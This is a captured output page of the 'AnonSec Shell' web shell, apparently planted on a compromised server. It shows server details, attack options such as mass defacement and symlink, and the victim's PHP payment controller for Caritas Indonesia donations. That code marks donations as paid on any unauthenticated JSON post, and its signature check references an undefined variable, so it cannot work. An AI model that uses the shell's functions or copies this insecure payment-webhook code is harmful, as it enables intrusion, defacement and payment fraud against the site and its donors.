AnonSec Shell

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell AnonSec Shell

Server IP : 104.21.79.64 / Your IP : 104.23.243.116 [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON
Directory : /var/app/karina/prd/apps/controllers/

Upload File :

[ HOME ] [ BACKUP SHELL ] [ JUMPING ] [ MASS DEFACE ] [ SCAN ROOT ] [ SYMLINK ]

Current File : /var/app/karina/prd/apps/controllers/Payment.php

<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class Payment extends CI_Controller {

	function __construct(){
		parent::__construct();		
		$this->load->model('Modglobal');
	}
	public function index()
	{} 
    //public function notification(Request $request) {
    public function notifications() {
        $notificationBody = file_get_contents('php://input');
        $data = json_decode($notificationBody,true);
        $no_invoice = $data['order']['invoice_number'];
        if($data['transaction']['status'] == "SUCCESS") {
            echo $no_invoice;
            //echo $data['transaction']['status'];
            
            $data = array(
                'status' => '1',
                'payment_type' => $data['service']['id'],
                'payment_bank' => $data['acquirer']['id'],
                'payment_info' => $data['virtual_account_info']['virtual_account_number'],
                'payment_date' => date("Y/m/d - h:i:sa"),
            );
            $where = array(
                'no_invoice' => $no_invoice
            );
            $this->Modglobal->update('donasi_list', $data,$where);

            $donasi_list_query= $this->Modglobal->find('donasi_list', array('no_invoice' => $no_invoice));
			$donasi_list = $donasi_list_query->row_array();


            $to = $donasi_list['email'];
            $from = getenv('MAIL_FROM');
            $name = getenv('MAIL_USERNAME');
            $url_base = base_url();
            $link = base_url();

            $message = '<h1>Transaksi Berhasil</h1><br><br>Terima kasih atas bela rasa dan dukungan Anda kepada gerakan kasih <br><br> Caritas Indonesia';

            $this->load->library('email');

            $config = array();
            $config['protocol'] = 'smtp';
            $config['smtp_host'] = getenv('MAIL_HOST');
            $config['smtp_user'] = getenv('MAIL_USERNAME');
            $config['smtp_pass'] = getenv('MAIL_PASSWORD');
            $config['smtp_port'] = getenv('MAIL_PORT');
            $config['mailtype'] = 'html';
            $config['smtp_crypto'] = 'ssl';
            $config['newline']      = "\r\n";

            $this->email->initialize($config);

            $this->email->from($from, 'Caritas');
            $this->email->to($to);
            $this->email->subject('[Caritas Indonesia] Pembayaran Donasi Berhasil');
            $this->email->message($message);

            $this->email->send();

        }
        else {
            echo 'gagal';
        }
    }
    public function notification() {
        $notificationHeader = getallheaders();
        $notificationBody = file_get_contents('php://input');
        $notificationPath = '/payments/notifications'; // Adjust according to your notification path
        //$secretKey = getenv('DOKU_KEY'); // Adjust according to your secret key
        $secretKey = getenv('DOKU_KEY'); // Adjust according to your secret key
    
        $digest = base64_encode(hash('sha256', $notificationBody, true));
        $rawSignature = "Client-Id:" . $notificationHeader['Client-Id'] . "\n"
            . "Request-Id:" . $notificationHeader['Request-Id'] . "\n"
            . "Request-Timestamp:" . $notificationHeader['Request-Timestamp'] . "\n"
            . "Request-Target:" . $notificationPath . "\n"
            . "Digest:" . $digest;
    
        $signature = base64_encode(hash_hmac('sha256', $rawSignature, $secretKey, true));
        $finalSignature = 'HMACSHA256=' . $signature;
    
        if ($finalSignature == $headers['Signature']) {
            // TODO: Process if Signature is Valid
            return response('OK', 200)->header('Content-Type', 'text/plain');

            //if(transaction.status == )
    
            // TODO: Do update the transaction status based on the `transaction.status`
        } else {
            // TODO: Response with 400 errors for Invalid Signature
            return response('Invalid Signature', 400)->header('Content-Type', 'text/plain');
        }
    }
    public function json() {
        $url = 'http://localhost/karina/sample.json';
        $json = file_get_contents($url);

        $data = json_decode($json,true);
        if($data['transaction']['status'] == "SUCCESS") {
            echo 'sukses';
        }
        else {
            echo 'gagal';
        }
        //ECHO $data['transaction']['status'];
// echo the JSON (you can echo this to JavaScript to use it there)
//echo $JSON;
//echo $JSON

// You can decode it to process it in PHP
$data = json_decode($json);
//var_dump($data);
    }

}

Anon7 - 2022
AnonSec Team